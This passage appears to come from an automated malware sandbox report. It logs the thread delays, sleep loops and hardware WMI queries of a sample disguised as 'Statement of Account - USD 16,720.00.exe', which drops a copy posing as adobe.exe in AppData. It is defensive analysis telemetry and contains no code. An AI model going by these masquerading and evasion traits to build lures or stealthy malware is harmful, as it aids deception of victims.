                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598905Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598466Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598029Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597921Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597617Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597479Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597076Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596421Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595874Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594740Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594604Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594315Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593421Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWindow / User API: threadDelayed 7534Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWindow / User API: threadDelayed 2313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 3009Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 6807Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 4279Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 5537Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep count: 32 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 5828Thread sleep count: 7534 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 5828Thread sleep count: 2313 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -599641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -599531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -599419s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -599312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -599203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -599092s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -598063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -597938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -597828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -597660s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -597172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -597000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -596000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -595891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -595766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -595641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -595531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -595422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -595310s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -595094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594648s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -594092s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -593985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe TID: 6476Thread sleep time: -593860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5052Thread sleep count: 3009 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5052Thread sleep count: 6807 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599124s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -598906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -598796s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -598687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -598468s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -598338s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -598218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -598109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597999s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597778s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597452s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597323s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -597093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596874s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596765s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596654s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596546s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -596109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595999s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595388s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595274s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595130s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -595000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -594890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -594781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -594671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -594562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -594453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3228Thread sleep time: -594341s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3712Thread sleep count: 4279 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599889s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3712Thread sleep count: 5537 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598905s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598796s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598466s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598140s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -598029s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -597921s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -597735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -597617s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -597479s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -597076s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596968s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596749s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596421s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -596093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595874s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595765s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595546s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -595000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -594890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -594740s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -594604s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -594315s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -594187s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -594078s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593968s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599531Jump to behavior
